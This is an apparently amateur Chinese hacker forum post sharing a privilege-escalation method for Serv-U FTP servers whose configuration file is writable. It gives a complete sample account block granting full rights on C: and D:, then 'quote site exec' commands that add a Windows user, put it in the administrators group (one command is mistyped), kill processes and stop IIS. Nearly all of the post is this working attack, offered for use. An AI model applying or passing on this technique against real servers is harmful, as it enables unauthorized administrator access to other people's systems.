有段时间提权，发现SU提权时候SU配置文件可写，可是不知道怎么写，正好有个服务器上装的SU就自己配置了一个，然后复制到待提权的机器上，发现很好用。为方便大家就发出来共享下。。。。 

　　User数字(第几个用户看服务器上，比方已经有10个那这写11)=用户名|1|0这个是是否生效用户的属性(这段是在最上面用户排列里面，下面的写到配置文件更底)

　　[USER=用户名|1]

　　Password=这个是密码=随机的两个字母+密码的32位MD5(我看了几个服务器上面的随机的两个字母基本上都是密码前两位)有的不加密。今天拿个服务器就没加40多个FTP用户密码。。呵呵

　　HomeDir=d:\ 这个是登陆时的工作目录

　　PasswordLastChange=1234233287这个不清楚，不动他就行

　　TimeOut=600 超时时间

　　Access1=C:\|RWAMELCDP 我这个是前面是目录后面是目录的属性全部包括读写移动复制执行

　　Access2=D:\|RWAMELCDP

　　下面是一个样板

　　账号密码都为wlke.C,D盘全部属性都有

　　User67=wlke|1|0

　　[USER=wlke|1]

　　Password=wl27f6b939142a0ba469073da622db84f7

　　HomeDir=d:\

　　PasswordLastChange=1234233287

　　TimeOut=600

　　Access1=D:\|RWAMELCDP

　　Access2=C:\|RWAMELCDP

　　这样我们用CMD FTP上去，加用户什么的都行，可以直接执行CMD。

　　FTP执行命令也一起发下。

　　quote site exec 后面加你要执行的CMD命令

　　举例

　　quote site exec net user 无忧公子 123456 /add 添加用户无忧公子

　　quote site exec net localhost administrators 无忧公子 /add 把用户 无忧公子 添加到管理员组

　　quote site exec tskill PID 在 Win 2003 中通过 PID 关闭进程

　　quote site exec tskill notepad 在 Win 2003 中通过名称关闭同类的进程

　　quote site exec net stop iisadmin 停止 iis 服务

　　quote site exec net start iisadmin 启动 iis 服务

　　。。。。。。

　　好了。有点累。

　　原创的，希望老鸟也支持下

　　谢谢。睡觉去了。。。。大家做个好梦